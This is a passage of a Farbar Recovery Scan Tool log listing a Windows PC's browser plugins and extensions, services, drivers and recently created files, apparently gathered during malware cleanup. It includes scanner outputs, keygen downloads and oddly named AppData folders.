FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-09-30] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2015-03-09] (Adobe Systems)
FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @nsroblox.roblox.com/launcher -> C:\Users\Kyle Aniel\AppData\Local\Roblox\Versions\version-f57d20c466824405\\NPRobloxProxy.dll [2013-01-01] ( ROBLOX Corporation)
FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @nsroblox.roblox.com/launcher64 -> C:\Users\Kyle Aniel\AppData\Local\Roblox\Versions\version-f57d20c466824405\\NPRobloxProxy64.dll [2013-01-01] ( ROBLOX Corporation)
FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @talk.google.com/GoogleTalkPlugin -> C:\Users\Kyle Aniel\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll [2015-12-08] (Google)
FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @talk.google.com/O1DPlugin -> C:\Users\Kyle Aniel\AppData\Roaming\Mozilla\plugins\npo1d.dll [2015-12-08] (Google)
FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @tools.google.com/Google Update;version=3 -> C:\Users\Kyle Aniel\AppData\Local\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-12] (Google Inc.)
FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @tools.google.com/Google Update;version=9 -> C:\Users\Kyle Aniel\AppData\Local\Google\Update\1.3.30.3\npGoogleUpdate3.dll [2016-05-12] (Google Inc.)
FF Plugin HKU\S-1-5-21-23814709-2432651133-2868963390-1001: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Kyle Aniel\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-08-28] (Unity Technologies ApS)
FF Plugin ProgramFiles/Appdata: C:\Users\Kyle Aniel\AppData\Roaming\mozilla\plugins\npgoogletalk.dll [2015-12-08] (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Kyle Aniel\AppData\Roaming\mozilla\plugins\npo1d.dll [2015-12-08] (Google)

Chrome:
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> hxxp://google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR DefaultSearchURL: Default -> hxxps://search.yahoo.com/search?fr=mcafee&type=C215US756D20151120&p={searchTerms}
CHR DefaultSearchKeyword: Default -> mcafee
CHR Plugin: (Widevine Content Decryption Module) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\WidevineCDM\1.4.8.866\_platform_specific\win_x86\widevinecdmadapter.dll => No File
CHR Plugin: (Shockwave Flash) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\PepperFlash\20.0.0.267\pepflashplayer.dll => No File
CHR Profile: C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default [2016-10-19]
CHR Extension: (Google Slides) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-04-19]
CHR Extension: (Crash King) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\ahbpokpfohopgmmdcgmgbhffofmepgoi [2015-09-21]
CHR Extension: (Angry Birds) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\aknpkdffaafgjchaibgeefbgmgeghloj [2015-04-22]
CHR Extension: (Google Docs) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-04-19]
CHR Extension: (Google Drive) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-21]
CHR Extension: (Audiotool) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkgoccjhfjgjedhkiefaclppgbmoobnk [2015-10-03]
CHR Extension: (YouTube) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Yahoo Partner) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmnghalbbgfaacplgindnehcnodlfpoc [2016-08-18]
CHR Extension: (Google Search) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-26]
CHR Extension: (Pandora) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\fbangkleohkafngihneedemihgfeikcl [2015-04-19]
CHR Extension: (Google Sheets) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-04-19]
CHR Extension: (McAfee® WebAdvisor) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2016-09-23]
CHR Extension: (Virtual Piano Black) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjagcpcbacoaogfljhglghpjhkmmfeeo [2015-04-24]
CHR Extension: (Chrome Remote Desktop) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbchcmhmhahfdphkhkmpfmihenigjmpp [2016-10-03]
CHR Extension: (Google Docs Offline) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-14]
CHR Extension: (TU-95 - Pilot the Plane!) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\hbjohfoloehbkffdihkengbkjgalmabj [2015-10-05]
CHR Extension: (PowerPoint Online) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdafamggmaaaginooondinjgkgcbpnhp [2015-04-24]
CHR Extension: (Google Classroom) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\mfhehppjhmmnlfbbopchdfldgimhfhfk [2015-04-24]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
CHR Extension: (Virtual Piano) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\opjaiienaabnkhbddalhcbceikjlloij [2015-04-24]
CHR Extension: (Gmail) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-19]
CHR Extension: (Chrome Media Router) - C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-10-18]
CHR Profile: C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\System Profile [2016-10-15]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-04-21]
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-04-21]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdAppMgrSvc; C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe [599944 2014-12-04] (Autodesk Inc.)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.)
S3 BstHdAndroidSvc; C:\Program Files (x86)\Bluestacks\HD-Service.exe [445976 2016-09-29] (BlueStack Systems, Inc.)
R2 BstHdLogRotatorSvc; C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe [425496 2016-09-29] (BlueStack Systems, Inc.)
S3 BstHdPlusAndroidSvc; C:\Program Files (x86)\Bluestacks\HD-Plus-Service.exe [466456 2016-09-29] (BlueStack Systems, Inc.)
R2 chromoting; C:\Program Files (x86)\Google\Chrome Remote Desktop\52.0.2743.48\remoting_host.exe [76616 2016-06-20] (Google Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3291848 2016-10-08] (Microsoft Corporation)
S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1467072 2016-06-22] (Disc Soft Ltd)
R2 gramblrclient; C:\Program Files\Gramblr\gramblr.exe [10220624 2016-10-13] () [File not signed]
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.)
R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2014-06-03] (Hewlett-Packard Company) [File not signed]
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
R2 HPWMISVC; C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [602888 2015-06-29] (Hewlett-Packard Development Company, L.P.)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-11-08] (Intel Corporation)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [365032 2016-01-26] (Intel Corporation)
R2 IHA_MessageCenter; C:\Program Files (x86)\Verizon\IHA_MessageCenter\Bin\Verizon_IHAMessageCenter.exe [372736 2015-01-27] (Verizon) [File not signed]
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [131544 2013-12-10] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-12-10] (Intel Corporation)
R3 lmhosts; C:\WINDOWS\System32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R3 lmhosts; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1136608 2016-03-10] (Malwarebytes)
R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [166152 2016-10-03] (McAfee, Inc.)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [993824 2016-07-07] (McAfee, Inc.)
S3 McAWFwk; C:\Program Files\Common Files\McAfee\ActWiz\McAWFwk.exe [334608 2013-07-24] (McAfee, Inc.)
R2 McBootDelayStartSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.9.829.0\\McCSPServiceHost.exe [1910000 2016-05-31] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.)
S3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [816128 2016-06-21] (McAfee, Inc.)
S4 McOobeSv2; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.)
R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [232688 2016-04-26] (McAfee, Inc.)
R2 mfeicfcore; C:\Program Files (x86)\Internet Content Filter\mfeicfcore.exe [2763896 2013-08-19] (McAfee, Inc.)
R2 mfeicfupdate; C:\Program Files (x86)\Internet Content Filter\UpdateService.exe [2260208 2013-08-19] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [382456 2016-06-23] (McAfee, Inc.)
R2 mfevtp; C:\Windows\system32\mfevtps.exe [277744 2016-04-26] (McAfee, Inc.)
R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1454216 2016-06-17] (McAfee, Inc.)
S3 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [596768 2016-07-07] (McAfee, Inc.)
R2 NlaSvc; C:\WINDOWS\System32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R2 NlaSvc; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 nsi; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R2 nsi; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [88064 2014-03-28] (Softex Inc.) [File not signed]
R2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [1045336 2016-05-25] (Intel Security, Inc.)
R2 PMBDeviceInfoProvider; C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe [494592 2015-04-17] (Sony Corporation)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [303360 2015-07-03] (Realtek Semiconductor)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [255096 2015-12-11] (Synaptics Incorporated)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BstHdDrv; C:\Program Files (x86)\Bluestacks\HD-Hypervisor-amd64.sys [152672 2016-09-29] (BlueStack Systems)
S3 BstkDrv; C:\Program Files (x86)\Bluestacks\BstkDrv.sys [270904 2016-09-27] (Bluestack System Inc. )
R3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [78632 2016-04-27] (McAfee, Inc.)
R1 CLVirtualDrive; C:\WINDOWS\system32\DRIVERS\CLVirtualDrive.sys [91912 2013-11-12] (CyberLink)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
R3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2016-07-30] (Disc Soft Ltd)
R3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [47672 2016-07-30] (Disc Soft Ltd)
S3 HipShieldK; C:\WINDOWS\System32\drivers\HipShieldK.sys [207968 2016-02-24] (McAfee, Inc.)
R3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [349960 2016-07-12] (Intel Corporation)
R3 ikbevent; C:\WINDOWS\system32\DRIVERS\ikbevent.sys [21408 2013-08-13] ()
R3 imsevent; C:\WINDOWS\system32\DRIVERS\imsevent.sys [21920 2013-08-13] ()
R3 ISCT; C:\WINDOWS\System32\drivers\ISCTD64.sys [46568 2013-08-13] ()
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [27008 2016-03-10] (Malwarebytes)
S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-10-18] (Malwarebytes)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [65408 2016-03-10] (Malwarebytes Corporation)
S0 megasas2i; C:\WINDOWS\System32\drivers\MegaSas2i.sys [64352 2016-10-05] (Avago Technologies)
R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [419616 2016-04-27] (McAfee, Inc.)
S3 mfeapfk; C:\WINDOWS\System32\drivers\mfeapfk.sys [181584 2014-10-01] (McAfee, Inc.)
R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [349480 2016-04-27] (McAfee, Inc.)
S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [83608 2016-04-27] (McAfee, Inc.)
R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [493352 2016-04-27] (McAfee, Inc.)
R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [843048 2016-04-27] (McAfee, Inc.)
R3 mfencbdc; C:\WINDOWS\System32\DRIVERS\mfencbdc.sys [519976 2016-04-27] (McAfee, Inc.)
S3 mfencrk; C:\WINDOWS\System32\DRIVERS\mfencrk.sys [100136 2016-04-27] (McAfee, Inc.)
R3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [46240 2016-06-06] (McAfee, Inc.)
R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [243488 2016-04-27] (McAfee, Inc.)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R3 NETwNb64; C:\WINDOWS\System32\drivers\Netwbw02.sys [3506464 2015-11-15] (Intel Corporation)
R3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [751632 2015-05-14] (Realsil Semiconductor Corporation)
S3 SmbDrv; C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [30448 2014-04-10] (Synaptics Incorporated)
R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [51320 2015-12-11] (Synaptics Incorporated)
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
R3 sthid; C:\WINDOWS\System32\drivers\sthid.sys [21216 2016-09-01] (Splashtop Inc.)
R1 VBoxNetAdp; C:\WINDOWS\system32\DRIVERS\VBoxNetAdp6.sys [121248 2016-09-12] (Oracle Corporation)
R1 VBoxNetLwf; C:\WINDOWS\system32\DRIVERS\VBoxNetLwf.sys [195936 2016-09-12] (Oracle Corporation)
S2 vcs; C:\Program Files (x86)\Common Files\Avnex\vcs64.sys [4096 2016-08-05] () [File not signed]
R3 VCSVADHWSer; C:\WINDOWS\system32\DRIVERS\vcsvad.sys [29320 2015-10-01] (AVSOFT Corp.)
R3 VirtualButtons; C:\WINDOWS\System32\drivers\VirtualButtons.sys [32024 2013-10-04] (Intel Corporation)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys [20800 2013-07-22] (Hewlett-Packard Development Company, L.P.)
R3 XSplit_Dummy; C:\WINDOWS\system32\drivers\xspltspk.sys [26200 2015-05-25] (SplitmediaLabs Limited)
S3 YMIDUSBW; C:\WINDOWS\system32\drivers\ymidusbx64.sys [43744 2015-07-28] (Yamaha Corporation)
U3 aspnet_state; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-19 14:47 - 2016-10-19 14:54 - 00043137 _____ C:\Users\Kyle Aniel\Downloads\FRST.txt
2016-10-19 14:47 - 2016-10-19 14:47 - 02407424 _____ (Farbar) C:\Users\Kyle Aniel\Downloads\FRST64.exe
2016-10-19 14:47 - 2016-10-19 14:47 - 00000000 ____D C:\FRST
2016-10-19 06:30 - 2016-10-19 14:39 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\f70e5
2016-10-19 05:32 - 2016-10-19 05:32 - 00000022 _____ C:\Users\Kyle Aniel\Desktop\ESETPoweliksCleaner.exe_20161019.053259.376.zip
2016-10-18 23:53 - 2016-10-18 23:53 - 00000000 ____D C:\WINDOWS\Minidump
2016-10-18 20:11 - 2016-10-18 20:12 - 00001291 _____ C:\Users\Kyle Aniel\Desktop\Stinger_18102016_201125.html
2016-10-18 19:56 - 2016-10-18 19:56 - 00000022 _____ C:\Users\Kyle Aniel\Desktop\ESETPoweliksCleaner.exe_20161018.195634.11928.zip
2016-10-18 19:54 - 2016-10-18 19:56 - 00001291 _____ C:\Users\Kyle Aniel\Desktop\Stinger_18102016_195440.html
2016-10-18 19:48 - 2016-10-18 19:48 - 00107331 _____ C:\Users\Kyle Aniel\Desktop\Report.pdf
2016-10-18 18:53 - 2016-10-18 18:53 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-10-18 18:52 - 2016-10-18 19:40 - 00001172 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-10-18 18:52 - 2016-10-18 18:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-10-18 18:52 - 2016-10-18 18:52 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-10-18 18:52 - 2016-10-18 18:52 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-10-18 18:52 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-10-18 18:52 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-10-18 18:52 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-10-18 18:50 - 2016-10-18 18:53 - 00003198 _____ C:\Users\banie_000\Desktop\Rkill.txt
2016-10-18 18:50 - 2016-10-18 18:51 - 22851472 _____ (Malwarebytes ) C:\Users\Kyle Aniel\Downloads\mbam-setup-2.2.1.1043.exe
2016-10-18 18:48 - 2016-10-18 18:50 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\Kyle Aniel\Downloads\rkill.exe
2016-10-18 18:41 - 2016-10-18 18:47 - 00001228 _____ C:\Users\Kyle Aniel\Desktop\Stinger_18102016_184114.html
2016-10-18 18:40 - 2016-10-18 18:40 - 00000809 _____ C:\Users\Kyle Aniel\Desktop\Stinger_18102016_184053.html
2016-10-18 15:52 - 2016-10-18 15:52 - 00000022 _____ C:\Users\Kyle Aniel\Desktop\ESETPoweliksCleaner.exe_20161018.155225.11816.zip
2016-10-18 14:48 - 2016-10-18 14:48 - 00000022 _____ C:\Users\Kyle Aniel\Desktop\ESETPoweliksCleaner.exe_20161018.144800.10524.zip
2016-10-18 14:47 - 2016-10-18 14:47 - 00000022 _____ C:\Users\Kyle Aniel\Desktop\ESETPoweliksCleaner.exe_20161018.144742.3924.zip
2016-10-18 14:45 - 2016-10-18 14:47 - 00224968 _____ (ESET) C:\Users\Kyle Aniel\Desktop\ESETPoweliksCleaner.exe
2016-10-18 14:35 - 2016-10-18 14:48 - 00001218 _____ C:\Users\Kyle Aniel\Desktop\Stinger_18102016_143535.html
2016-10-18 14:30 - 2016-10-19 05:15 - 00000120 ___RH C:\Users\Kyle Aniel\Desktop\Stinger.opt
2016-10-18 14:17 - 2016-10-18 14:17 - 00000000 ____D C:\Quarantine
2016-10-18 14:16 - 2016-10-18 14:26 - 00001291 _____ C:\Users\Kyle Aniel\Desktop\Stinger_18102016_141646.html
2016-10-18 14:16 - 2016-10-18 14:15 - 16056688 _____ (McAfee Inc) C:\Users\Kyle Aniel\Desktop\stinger64.exe
2016-10-17 21:28 - 2016-10-17 21:30 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\ont2012xnj
2016-10-17 21:28 - 2016-10-17 21:30 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\ont2012x
2016-10-17 21:26 - 2016-10-17 21:26 - 40738663 _____ C:\Users\Kyle Aniel\Downloads\ont2012x.zip
2016-10-17 21:26 - 2016-10-17 21:26 - 00590905 _____ C:\Users\Kyle Aniel\Downloads\ont2012xnj.zip
2016-10-17 21:17 - 2016-10-17 21:17 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\md80_cls_american_airlines
2016-10-17 21:16 - 2016-10-17 21:17 - 04223899 _____ C:\Users\Kyle Aniel\Downloads\md80_cls_american_airlines.zip
2016-10-17 20:22 - 2016-10-17 20:22 - 16057249 _____ C:\Users\Kyle Aniel\Downloads\Panama City Beach Sunset Time-Lapse.mp4
2016-10-17 19:20 - 2016-10-17 19:35 - 681446176 _____ C:\Users\Kyle Aniel\Desktop\nana project.mp4
2016-10-17 19:17 - 2016-10-17 19:34 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\New folder (2)
2016-10-17 18:43 - 2016-10-17 18:43 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\2016-10
2016-10-16 20:26 - 2016-10-16 20:26 - 03546096 _____ C:\Users\Kyle Aniel\Downloads\Flight1_Coolsky_Super_keygen (1).zip
2016-10-16 20:26 - 2016-10-16 20:26 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\35554
2016-10-16 20:22 - 2016-10-16 20:25 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\Flight1_Coolsky_Super_keygen
2016-10-16 20:22 - 2016-10-16 20:23 - 84771760 _____ ( Flight1, Inc.) C:\Users\Kyle Aniel\Downloads\Super80-Professional.exe
2016-10-16 20:22 - 2016-10-16 20:22 - 05123441 _____ C:\Users\Kyle Aniel\Downloads\Flight1_Coolsky_Super_keygen.zip
2016-10-16 17:58 - 2016-10-16 19:33 - 00148096 _____ C:\Users\Kyle Aniel\Desktop\nana project.wlmp
2016-10-16 17:17 - 2016-10-16 17:18 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\edited picture
2016-10-16 08:53 - 2016-10-16 09:07 - 00000165 _____ C:\Users\Kyle Aniel\Desktop\New Text Document (3).txt
2016-10-16 06:34 - 2016-10-18 19:40 - 00002597 _____ C:\Users\Public\Desktop\AESHelp for FSX.lnk
2016-10-16 06:32 - 2016-10-16 06:32 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\Aerosoft - Airport Enhancement Services (AES)2.21
2016-10-16 06:31 - 2016-10-16 06:31 - 59054928 _____ C:\Users\Kyle Aniel\Downloads\Aerosoft - Airport Enhancement Services (AES)2.21.rar
2016-10-15 21:18 - 2010-08-19 22:47 - 00000017 _____ C:\Users\Kyle Aniel\Desktop\FSINN.cfg
2016-10-15 21:17 - 2016-10-15 21:17 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\MD-8x
2016-10-15 21:11 - 2016-10-15 21:11 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSUIPC 4.858
2016-10-15 21:03 - 2016-10-15 21:10 - 09338380 _____ C:\Users\Kyle Aniel\Downloads\FSUIPC 4.858.rar
2016-10-15 16:49 - 2016-10-15 17:00 - 2048196608 _____ C:\Users\Kyle Aniel\Downloads\7601.17514.101119-1850_Update_Sp_Wave1-GRMSP1.1_DVD.iso
2016-10-15 15:23 - 2016-10-15 15:24 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\boeing777v2
2016-10-15 15:22 - 2016-10-15 15:23 - 07004238 _____ C:\Users\Kyle Aniel\Downloads\boeing777v2.zip
2016-10-15 15:07 - 2016-10-15 15:07 - 01567616 _____ C:\Users\Kyle Aniel\Downloads\p787msx.zip
2016-10-15 11:57 - 2016-10-15 11:58 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\Fs_Panel_Studio_keygen_by_Inferno
2016-10-15 11:57 - 2016-10-15 11:57 - 05050888 _____ C:\Users\Kyle Aniel\Downloads\Fs_Panel_Studio_keygen_by_Inferno.zip
